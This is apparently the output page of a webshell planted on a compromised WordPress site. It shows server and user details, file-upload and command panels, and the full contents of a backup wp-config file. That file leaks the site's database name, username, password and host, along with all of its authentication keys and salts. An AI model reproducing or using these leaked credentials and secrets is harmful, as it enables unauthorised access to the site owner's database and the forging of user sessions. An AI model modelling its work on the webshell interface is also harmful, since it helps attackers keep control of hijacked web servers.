403Webshell
Server IP : 217.160.0.143  /  Your IP : 216.73.216.143
Web Server : Apache
System : Linux info 3.0 #1337 SMP Tue Jan 01 00:00:00 CEST 2000 all GNU/Linux
User : u89353126 ( 3190106)
PHP Version : 8.2.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /homepages/36/d682636120/htdocs/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /homepages/36/d682636120/htdocs/public_html/wp-config_old2.php
<?php
/** Enable W3 Total Cache */

/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'dbs29555');

/** MySQL database username */
define('DB_USER', 'dbu65165');

/** MySQL database password */
define('DB_PASSWORD', 'beaney1983');

/** MySQL hostname */
define('DB_HOST', 'db5000034485.hosting-data.io');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

define('WP_MEMORY_LIMIT', '256M');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY', '?N[&pLTf+=;pyMa(}VFnscrgy}DIr*F;EzyRvABg-KS-kSJqJ|drofnP$BS;A;|__<e!/dlf$l?yRr]/=?<xyR}|+sA$C%?J@h|%bL=mQhjWR}YE_T|yUp<ONPd]U?L>');
define('SECURE_AUTH_KEY', 'Ltur/+fj@Dh/(^v?ifcAMwESe_>=(q>yj@!CJ^;gC(CbpMm=>pDGcecExeBNXCK<MV_MD*sxG/f%w{MYmUfs<&X=YkXT_H!qZ|sFr[IWQkYpC+TPj{f%Tw@=+hg%lv+s');
define('LOGGED_IN_KEY', 's}ar/[mkjdlo@eOl/q|C^-CI*GCv&_n(VW(ABFSm)st&GOeKTBbucI!aGMGzc|Q+>ck@ZoX^ds+KCC*=_GVyBTYsp>MUyTF!$v|[th%IlR>JU*|Mcnk/%?laX]s^_|_-');
define('NONCE_KEY', '@+/G}x&JxnFtXuov*ILn)FGO%zZR^zxQd!]TfkZAJ&nB&ic}Z)fkoezNU)Vhmu>v+s[DnyE/rdCjvwelIentYtpJBpl>Q-jWS}|h=VA|Dw(J{*FTNXwyCAQBLX?n)FYz');
define('AUTH_SALT', 'abAPrW>{NNDhQl<aBmL@)uUKxEOLoK$[+Zn?{$>YSm?jIgpg-kJVa_KqjTKHjOX!LmM+?wL&NiC;|UrdxX=t[S)ra]Uvkx?l&RAYiqd*CtrakJ%gdCWft(_szg^gB+&M');
define('SECURE_AUTH_SALT', 'wBeZ?qqGBsakm+{qlBSWTs>_CRLyTy|L=AUBF@QFBCWhO%ZfQ^gBwz=I_oc]/Xw_fUvVyFjbXXhn|Deje|k^(j?<cY-bNbMcjIXQ(QCn%T-q)!u|m*@yKdK-QYxTVwOn');
define('LOGGED_IN_SALT', 'SmvD%Min/OVuddebHhq=HQ@^&qCbW;QD]OJR?iW]grY?[=fxy<p*xUKLnIO]&fm|mxO[?L}|-I[v?rowowp*-x[(ej(V!H!E+Hybo=s;QsRmEocxDe@QEt%$_sjgervE');
define('NONCE_SALT', '/INewml+{&GQ-Af@APdipuJLTxgp|%<YaHC<+Xj[E>;IHkCL|?wpis<)>}ENywzNj%VRDpnzVRme)AoRwiMBaWz+ezVA=gnBE(RCz[wzBdaJItfj@p=($atzUXZY^niw');

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_bxfp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define('WP_DEBUG', true);
define('WP_DEBUG_DISPLAY', false);
define('WP_DEBUG_LOG', true);


/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
	define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

/*
 * Include tweaks requested by hosting providers.  You can safely
 * remove either the file or comment out the lines below to get
 * to a vanilla state. */
 
if (file_exists(ABSPATH . 'hosting_provider_filters.php')) {
	include('hosting_provider_filters.php');
}

Youez - 2016 - github.com/yon3zu
LinuXploit